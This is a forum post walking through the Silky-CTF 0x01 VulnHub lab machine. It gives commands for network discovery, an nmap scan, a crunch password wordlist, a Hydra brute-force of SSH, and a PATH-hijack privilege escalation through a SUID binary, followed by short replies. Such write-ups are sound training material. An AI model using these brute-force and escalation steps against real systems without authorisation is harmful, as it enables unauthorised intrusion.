Silky-CTF: 0x01 Vulnerability Machine's Solution

M3m0ry

Kıdemli Üye
3 Haz 2017
4,411
136
4
xD
Hi TurkHackTeam Family, I'll show you "How to Solve Silky-CTF: 0x01 Vulnerability Machine" today.

https://www.vulnhub.com/entry/silky-ctf-0x01,306/

Machine Name: Silky-CTF: 0x01
Release Date: 27 April 2019
Author: Silky
Series: Silky-CTF
Description: Find the Flag on Target's Root directory
File Size: 2.5 GB
Operating System: Linux
Difficulty: Easy-Medium

First of all, to learn to Machine's IP adress, type:

Kod:
sudo netdiscover

HCefxM.jpg


We learned IP address of our target with this.

x3aPc8.jpg


To learn which ports are open by NMAP scanning, type:

Kod:
nmap -A IP_ADDRESS

As you can see 22 and 80 ports are opened and what important in here is robots.txt and notex.txt which i was particularly showed with blue color.

aJyUOR.jpg


I understand it was a website because 80 port are opened. When I go to website I can see this is a website apache-based website.

OM8MIy.jpg


First, I went to robots.txt, it forwarded me to notex.txt. There is a text in Deutsch.

HT3xRx.jpg


When we translate It, I see this message "I absolutely have to remote the password from the page, after all, the last 2 characters are missing. But still.".

Ke8LcN.jpg


Next, i back to website and I looked to codes and I found somethings in "script.js" file.

9G0QTO.jpg


As you can see we found some values about password.

zPN2yA.jpg


"Password's last 2 letters lost" gave us a hint.

I'll create password list with crunch tool.

Kod:
crunch 7 7 -t s1lKy^% >> password.txt

I wrote this in terminal and password list created.

M3bWQV.jpg


We'll brute attack to SSH service with Hydra tool, type the following code to the Terminal:

Kod:
hydra -l silky -P password.txt IP_ADRES ssh

Now we got the password.

PfcTxR.jpg


To connect as SSH, type:

Kod:
ssh silky@IP_ADDRESS

J37bP4.jpg


I searched for SUID featured files and /usr/bin/sky file caught my eye.

Kod:
/usr/bin/sky

I wrote this and saw some Deutsch texts and the word of root.

abc2eJ.jpg


I already ran whoami command.

U0V0W8.jpg


Hc614c.jpg


To Boost to root, I'll use PATH variant. For this:

Kod:
echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky

In a kind of funny way, i didn't get root boost by typing "id".

Kod:
cd /root

But when i type the above code, i didn't get any error about permissions and got my flag.

SUMJax.jpg


/Translation Club M3m0ry\

Thanks

"P4RS & R4V3N
 
Son düzenleme:

PW

Katılımcı Üye
2 Ara 2018
793
10
:C / Adobe
Cevap: Silky-CTF: 0x01 Zafiyetli Machine's Solution **M3m0ry-P4RS**

Subject beautiful brother :)
 

R4V3N

Adanmış Üye
3 Tem 2016
6,250
38
26
Kocaeli
Cevap: Silky-CTF: 0x01 Zafiyetli Machine's Solution **M3m0ry-P4RS**

Good job my friend :)
 

SP

Kıdemli Üye
29 Eki 2018
2,761
650
great job my friend
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.